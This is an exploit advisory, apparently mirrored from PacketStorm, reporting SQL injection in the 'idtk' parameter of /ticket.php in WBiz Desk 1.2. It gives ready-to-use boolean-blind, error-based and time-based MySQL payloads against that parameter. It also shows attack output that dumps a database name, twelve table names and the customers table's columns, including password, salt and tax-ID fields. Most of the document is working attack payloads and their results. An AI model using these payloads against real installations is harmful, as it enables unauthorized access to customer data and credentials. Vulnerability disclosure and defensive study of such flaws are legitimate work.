## https://sploitus.com/exploit?id=PACKETSTORM:172506
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Vulnerability ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr :
โ Website : https://www.codester.com/items/5641/ โ
โ Vendor : WeBiz Digital โ
โ Software : WBiz Desk 1.2 โ
โ Vuln Type: SQL Injection โ
โ Impact : Database Access โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ โ
โ SQL injection attacks can allow unauthorized access to sensitive data, modification of โ
โ data and crash the application or make it unavailable, leading to lost revenue and โ
โ damage to a company's reputation. โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2023 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Path: /ticket.php
http://website/ticket.php?tk=1&idtk=[SQLi]&action=close
GET parameter 'idtk' is vulnerable to SQL Injection
---
Parameter: idtk (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close
---
[+] Starting the Attack
fetching current database
current database: 'wbizdesk_*****_com_br'
fetching tables
[12 tables]
+----------------+
| accounts |
| category |
| chat |
| config |
| customers |
| departments |
| email_template |
| log_tb |
| messages |
| tickets |
| tutorial |
| users |
+----------------+
fetching columns for table 'customers'
[19 columns]
+--------------+-------------------+
| Column | Type |
+--------------+-------------------+
| name | varchar(160) |
| number | varchar(11) |
| status | enum('S','B','N') |
| address | varchar(255) |
| city | varchar(160) |
| company | varchar(160) |
| country | varchar(60) |
| cpf_cnpj | varchar(60) |
| email | varchar(255) |
| id | int(11) |
| ip | varchar(90) |
| neighborhood | varchar(160) |
| obs | text |
| os | varchar(160) |
| pass | varchar(160) |
| phrase | varchar(160) |
| salt | varchar(255) |
| state | varchar(160) |
| zipcode | varchar(60) |
+--------------+-------------------+
[-] Done